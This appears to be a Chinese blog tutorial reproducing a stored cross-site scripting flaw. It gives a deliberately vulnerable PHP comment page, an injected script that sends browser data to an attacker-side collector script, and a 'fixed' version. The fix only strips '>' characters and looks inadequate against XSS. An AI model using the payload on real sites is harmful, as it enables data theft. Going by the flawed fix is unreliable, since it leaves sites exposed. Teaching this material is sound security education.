zoukankan      html  css  js  c++  java

  • 存储型 XSS 原理复现

    存储型 XSS 原理复现


    漏洞最少会影响 3 个逻辑实体:

    • 受害者浏览器
    • 攻击者服务器
    • Web 应用服务器
    • Web 应用数据库(可有可无)

    制作漏洞

    Web 应用服务器:

    <?php
    // 显示多个用户的评论
    // 获取用户提交的评论,并存储
    $file = fopen('comment.txt','a');
    fwrite($file,$_GET['comment'].'<br/>');
    fclose($file);

    // 在页面中显示所有评论
    echo '<h1>元芳,你怎么看</h1>';
    $file = fopen('comment.txt','r');
    fpassthru($file);
?>

    利用漏洞

    攻击者提交的评论:

    http://172.168.30.78:8080/?comment=
<script>var ele=document.createElement('img');ele.src="http://172.168.30.78:8080/hack.php?info=" + navigator.platform;</script>

    攻击者的服务器:

    <?php
    $info = $_GET['info'];
    $file = fopen('1.txt','a');
    fwrite($file,$info);
?>

    修复漏洞

    应用服务器:

    <?php
    // 显示多个用户的评论
    // 获取用户提交的评论,并存储
    $file = fopen('comment.txt','a');
    fwrite($file,str_replace('>','',$_GET['comment']).'<br/>');
    fclose($file);

    // 在页面中显示所有评论
    echo '<h1>元芳,你怎么看</h1>';
    $file = fopen('comment.txt','r');
    fpassthru($file);
?>
  • 相关阅读:
    Storm应用系列之——集成Kafka
    Storm常见模式——分布式RPC
    Storm常见模式——流聚合
    博客迁移
    设计模式学习笔记
    JStorm模型设计
    MySQL学习笔记
    JAVA学习笔记
    JavaScript学习笔记
    用ACE来写代码
  • 原文地址:https://www.cnblogs.com/shiwai/p/14183660.html
Copyright © 2011-2022 走看看